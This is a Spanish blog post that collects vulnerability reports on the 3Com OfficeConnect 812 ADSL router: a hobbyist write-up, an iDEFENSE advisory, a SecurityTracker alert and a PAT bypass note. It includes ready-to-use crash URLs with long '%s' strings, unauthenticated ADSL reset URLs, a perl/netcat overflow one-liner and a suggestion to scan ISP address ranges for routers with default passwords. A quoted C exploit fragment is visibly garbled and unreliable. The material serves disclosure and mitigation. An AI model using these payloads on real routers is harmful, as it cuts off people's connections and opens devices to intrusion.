• Administro la red informática de una empresa con Windows
  • Soy wembaster de más de 20 páginas web
  • Hago una tesis doctoral en ingeniería con Linux
  • Estudié Física e Ingeniería
  • Me gusta la seguridad informática y hacer de hacker

Vulnerabilidades del Router 3Com OfficeConnect 812 de Telefónica

Vulnerabilidades del Router 3Com OfficeConnect 812 de Telefónica

PROBLEMA

Tengo un router 3Com OfficeConnect 812 en mi casa. Quiero ver su seguridad... y me llevo una sorpresa: es un coladero.

CAUSA
Tiene unas cuantas vulnerabilidades y exploits.

SOLUCIÓN
Tirarlo. Aunque algunos dicen que se arregla con un software nuevo. El mío se rompió poco después y me lo cambiaron los de Telefónica por un Zyxel.

DESARROLLO

Investigando sobre la seguridad de mi router, me llevé unas cuantas sorpresas. Aquí os las cuento.

La primera de ellas es que el 3com no guarda registro de los intentos de ataque ni de las entradas.

Para los hackers y los spammers hay un ejercicio muy sencillo, que está al alcance de cualquier fortuna: escanear con nmap un buen número de ip's de telefónica. Ver cuáles tienen el 3 Com e intentar entrar. Es bastante sencillo, sobre todo si no han quitado la contraseña por defecto que viene de fábrica, que es de todos conocida.

A continuación os pongo algunos artículos interesantes sobre el tema, que me encontré investigando por la red (están separados por una línea de asteriscos):

Lo que aqui voy a relatar es un fallo de un router bastante conocido en España. El texto que en principio estaba escrito a lo bestia y recien descubierto el fallo, lo voy a intentar estirar un poco más y así poder explicarlo a la gente 'nueva' interesada en estos temas, a ver si lo españoles o por lo menos los maños ;-) le damos un poco de vida en castellano a esto de la investigación... o contrainvestigacion :-P. Lo que esta claro es que nada de esto lo comparto para joder a nadie, esta claro que me podria divertir mucho con todos estos señores malos que se desprotegen el router, le cambian la contraseña, le quitan los filtros y se dedican a escanear dominios en busca de probar lo que en tal o cual ¿"tutorial"? le enseñan a hacer (si, lo cierto es que el 'net' da mucho juego con estos señores ;). Bueno, el caso, este texto lo difundo porque no me creo que 3COM(p) o Allegro lo desconocieran (y sin embargo no han dicho nada), tambien me parece curioso que Telefonic(a) tubiera hasta hace poco especial interes en instalar un router con un software especialmente antiguo para el 2000-2001 (el Allegro-Software-Rompager 2.10), ¿muchas unidades a bajo precio? por caracteristicas y marca el 3COM deberia ser al menos el doble de caro que el SpeedStream.... bueno........, y aparte de todo esto, no se, de alguna manera hay que agradecer a todo el mundo del que has aprendido cosas el haberlas aprendido, y eso no se hace callandote las que descubres. ¿La pena? No volver a poder joder al cabron del tipo que sestaba intentando meter en mi FTP (bufffff..... mencantan los nombres chungos, FXP'ers o algo asi? XDDDDDDDDDDDDDDDDDDD). Bueno, el caso es que aqui teneis un fallo de la vida real, que lo podeis probar en casa, os puede dar pie a investigar otras cosas, y eso seria cojonudo. Adelante :-P

• OVERVIEW


ROUTER: 3COM OfficeConnect 812 (el blanco con hub de 4 puestos de la Timofonica :P)
Fallo en el servidor de HTTP (puerto 80 TCP). - Allegro-Software-Rompager v.2.10

• HARDWARE


Seguro que se utilizara varios routers más, o automatas u otros aparatos puesto que la marca no se dedica a la construccion de servidores gansos ni nada asi sino a los aparatejos configurables via HTTP. Bueno, lo mejor es que mireis la pagina del fabricante del software (no del firmware, sino de la parte que actua de servidor de web).

http://www.allegrosoft.com

• PROBLEMA


Bien, el problema es parte de 3COM y parte de los autores del servidor. ¿Porque digo esto?. Intentar buscar una parte desprotegida en el SpeedStream. Quiero decir, intentar buscar un GIF, un HTM, un archivo que sepais que esta ahí, pero..... upsssssss.... os pide password. Bien buscar uno que no os la pida. No, ¿verdad?. ¿Os habeis fijado lo que pone cuando metes mal la password?. Una simple y llama linea ni siquiera siguiendo el HTTP, texto puro, que pone no se que historias de que mala autentificacion (no tengo el router a mano ahora). Bien, el 3COM comete un fallo. Intentar meteros....... os pide password, y la fallais... cojonudo, os sale una preciosa pagina web que pone que ese objeto esta protegido.... bien, echemos un vistazo a su html:


// Ya de primeras me parece chungo lo de una NMI en un router......
bueno...... pasando.....


// Primera cosa graciosa........ tenemos acceso al archivo sml3com... bueno, de hecho tenemos acceso a todo el /graphics entero, aunque no estemos autentificados. (esto es fallo por supuesto de 3COM).


// A /Images tambien tenemos acceso

¿Que quiere decir todo esto? Que se nos han dejado ficheros con acceso con los cuales quiza podamos hacer algo.
Lo primero que se me ocurre es probar a ver a que más tenemos acceso a simple vista........ /Images, /graphics....

Bueno, ni en graphics ni en Images encuentro nada a la primera. Joder... miro el primer GIF, el sml3com XDDDDDDDDDDDDD.......... bueno, para buen inri tiene 666 bytes XDDDDDDDDDDDDDD joder, se merece una intentona, no? XDDDDDDDDDDDDDDDD probemoslo.

http://192.168.1.254/graphics/sml3com
Justo,.... aparece el GIF en pantalla

Sigamos probando...
http://192.168.1.254/graphics/sml3com%ñ
The requested URL '/graphics/sml3com%%C3%B1' was not found on the OfficeConnect server
Algo sacaremos de ahi algun dia con menos petas encima XDDDDDDDDDDDDDDDD

http://192.168.1.254/graphics/../../../000000000000000000000000000000000000000000000000000000000000000000
El router no muestra nada, pasa de nosotros. Bueno, es lo mejor que puede hacer XDDDDDDDDDDD

Ale pues con las tipicas "s"
http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s

Uhm...... se lo piensa....... parece que lo de siempre................ coñoooooooo.............. el router ha petao :-)... luces rojas....... luces de todos colores....... router a tomar por saco......... Curioso, solo lo hace cuando tiene un archivo con acceso delante. Vamos... la culpa de la imprudencia es de 3COM por el diseño de la web interna del bicho, y la culpa del bug esta claro que de los de allegro.... sigamos....

http://192.168.1.254/images/../filterSummary%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S
%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S
%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S

Esta claro..... con cualquier peticion de algo que exista con un cadenon detras, el bicho peta...

1 hora mas tarde.......... continué viendo los nombres de los archivos en mi router con mi clave y probandolos en el FXPero (lo siento, pero a estas horas de la noche ya tengo la cabeza echa polvo XDDDDDDDD)

Encontramos otro fallo de seguridad.......... joder esta gente son la leche....... no necesitamos password para entrar aqui :-)
http://192.168.1.254/adsl_pair_select
Warning! Changing the pair setting resets the line. When the line resets all currently active remote site connections are dropped.
// Tiene cojones, ademas nos avisa ;-)

Y por ultimo ya, antes de echarme a sopar.......... me encuentro con esto.........
http://192.168.1.254/adsl_reset

Resetting the ADSL line causes the modem to renegotiate the ADSL level connection.
Warning! If you reset the line all currently active remote site connections will be dropped.

// Sin comentarios ;-)


• EXPLOITS


http://192.168.1.254/adsl_reset
http://192.168.1.254/adsl_pair_select
http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s

• RESOLUCION DEL PROBLEMA


Que yo sepa no se le puede actualizar el soft de HTTP, el RomPager, asi que a joderse y a poner filtros que para algo están ;-). Aquel que necesite
configurar el router remotamente, y desde IP's diferentes........ pues puede poner un filtro que no deje pasar ninguna IP de ningun sitio remoto hacia el puerto 80, y añadir un puerto en la NAPT, que no se escanee facilmente, por ejemplo cualquier del 10000 al 65535, y reconfigurao para que todo lo que entre en el 10000 de TCP por ejemplo, lo tenga que rutar al 127.0.0.1 (loopback) al 80... o a la IP local que tenga el router, al 80. El que solo lo vaya a configurar desde su ordenador, que ponga filtros al 80 y punto. Como consejillo........ preveo algun fallo en el escuchador del RIP, asi que de consejillo os dejo que pongais un filtro que no deje pasar ninguna IP (ojo, ni por TCP ni por UDP)..... y tras eso ya veremos si al RIP le afecta eso ;))

Siento no extenderme más pero....... tengo que acabar una web..........
talego! :P

Like always... Not Copyrighted by UnMateria'01
Contacto: ix_lsd@hotmail.com (no me como a nadie, pero tampoco respondo a todo el mundo ;)

Cualquier duda, a los foros.
Creado por UnMateria para http://www.bandaancha.st

*****************************************************************


Date: Thu, 27 May 2004 12:37:51 -0400
From: idlabs-advisories@idefense.com
Subject: iDEFENSE Security Advisory 05.27.04: 3Com OfficeConnect Remote 812





3Com OfficeConnect Remote 812 ADSL Router Authentication Bypass
Vulnerability

iDEFENSE Security Advisory 05.27.04
www.idefense.com/application/poi/display?id=106&type=vulnerabilities
May 27, 2004

I. BACKGROUND

The 3Com OfficeConnect Remote 812 ADSL Router is a standalone
bridge/router, with interfaces to a Local Area Network and an ADSL
interface to a Wide Area Network.

II. DESCRIPTION

Remote exploitation of an authentication bypass vulnerability in 3Com's
OfficeConnect Remote 812 ADSL Router could allow remote users to
arbitrarily manipulate network traffic.

By making multiple successive authorization attempts to connect to the
router, it is eventually possible to authenticate with any
username/password combination. While the root cause of the vulnerability
is not known, exploitation is trivial and does not require either a
known username or password.

III. ANALYSIS

Successful exploitation allows an attacker to perform any administrative
function that a legitimate administrator could perform.

More information about the 3Com OfficeConnect Remote 812 ADSL Router is
available at
http://www.3com.com/products/en_US/detail.jsp?tab=support&pathtype=suppo
rt&sku=3CP4144.

IV. DETECTION

iDEFENSE has confirmed that the 3Com OfficeConnect Remote 812 ADSL
Router with the last firmware patch is vulnerable

V. WORKAROUNDS

A previously given workaround for other issues with the HTTP interface
is available at the link shown. This shows how to configure the router
to prevent external access to the HTTP port.

http://support.3com.com/infodeli/tools/remote/ocradsl/http_filtering.pdf

VI. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0477 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VII. DISCLOSURE TIMELINE

02/18/04 Exploit acquired by iDEFENSE
03/08/04 iDEFENSE Clients notified
03/11/04 Initial vendor notification - no response
03/30/04 Secondary vendor notification - no response
05/27/04 Public Disclosure

VIII. CREDIT

Rafel Ivgi is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

IX. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



***********************************************************

(Exploit Code is Available) 3Com OfficeConnect DSL Router Can Be Crashed With Long URL

SecurityTracker Alert ID: 1009206
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Feb 25 2004

Impact: Denial of service via network

Exploit Included: Yes

Version(s): Firmware 1.1.9; Model 812

Description: A denial of service vulnerability was reported in the 3Com OfficeConnect DSL router (model 812). A remote user can cause the router to crash.

David Madrid reported that authentication is not required on the web-based administration interface, allowing a remote user on the LAN interface to trigger a buffer overflow by sending a specially crafted URL to the device to cause the device to crash and reboot.

A demonstration exploit command is provided:

perl -e 'print "A"x512;print "\n\n\n\n\n\n\n\n"' | netcat -v -n 192.168.0.1 80

If the web-administration interface has been enabled on the WAN interface, then a remote user on the Internet can trigger the flaw, according to the report.

Shaun Colley has submitted some demonstration exploit code, available in the Source Message [it is Base64 encoded].

Impact: A remote user can cause the device to crash and reboot.

Solution: No solution was available at the time of this entry. stdout);
SEND(JOIN);
if(timeout(sd) < buff =" malloc(BUFFSZ);" tv_sec =" TIMEOUT;" tv_usec =" 0;" err =" select(sock" host_ip =" inet_addr(host);" host_ip ="="" hp =" gethostbyname(host);" host_ip =" *(u_long">h_addr;
}
return(host_ip);
}



#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif

Vendor URL: www.3com.com/ (Links to External Site)

Cause: Boundary error

Reported By: http://securitytracker.com/archives/idreportedby/1938.html

Message History: This archive entry is a follow-up to the message listed below.

************************************************

Existe un problema en el PAT de los routers 3Com OfficeConnect Remote 812 ADSL Router que puede utilizarse para acceder a todos los puertos de la máquina que haya detrás del router.

Cuando intentamos conectar a un puerto que no está redirigido a la máquina que haya detrás del router, usando PAT no hay problema, simplemente el router no permite dicha conexión. Pero si conectamos a un puerto que esté redirigido mediante PAT, e inmediatamente tratamos de conectar a cualquier otro puerto no redirigido por PAT, el router permite las conexiones sucesivas a cualquier puerto. Dicho problema existe tanto en TCP como en UDP.

Página1/1

NAT es una funcionalidad que se encuentra en routers, firewalls, etc... que permite traducir direcciones, generalmente internas e inexistentes en internet, a direcciones públicas existentes.

Un cierto tipo de NAT es el PAT (Port Address Translation). PAT mapea conexiones internas a una dirección IP única de la red externa.

El fallo ha sido probado en las versiones v1.1.9 y v1.1.7 del OCR812.

La solución al fallo consiste en instalar un firewall en las máquinas que haya detras del router o esperar a una actualización del fabricante.

Más información:
- http://www.3com.com/
- http://online.securityfocus.com/archive/1/274239

Comments on "Vulnerabilidades del Router 3Com OfficeConnect 812 de Telefónica"

 

post a comment

Links to "Vulnerabilidades del Router 3Com OfficeConnect 812 de Telefónica"

Create a Link